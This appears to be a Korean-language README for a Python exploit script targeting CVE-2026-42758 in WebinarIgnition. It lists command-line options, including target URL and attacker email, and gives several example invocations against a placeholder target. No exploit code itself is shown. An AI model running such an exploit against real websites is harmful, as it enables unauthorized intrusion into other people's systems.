
WebinarIgnition을 대상으로 하는 CVE-2026-42758용 Python 익스플로잇 스크립트입니다. 사용자 지정 대상 URL, 공격자 이메일, 자세한 모드 및 선택적 이름/성 매개변수를 지원합니다.
CVE-2026-42758 WebinarIgnition Exploit 사용 예시 기본 사용법
python3 exploit.py https://target.example.com -e [email protected] 웨비나 페이지 지정
python3 exploit.py https://target.example.com
-e [email protected]
-w https://target.example.com/webinar/my-webinar/
Verbose 모드
python3 exploit.py https://target.example.com
-e [email protected]
-v
사용자 지정 이름 정보
python3 exploit.py https://target.example.com
-e [email protected]
-f John
-l Doe
-v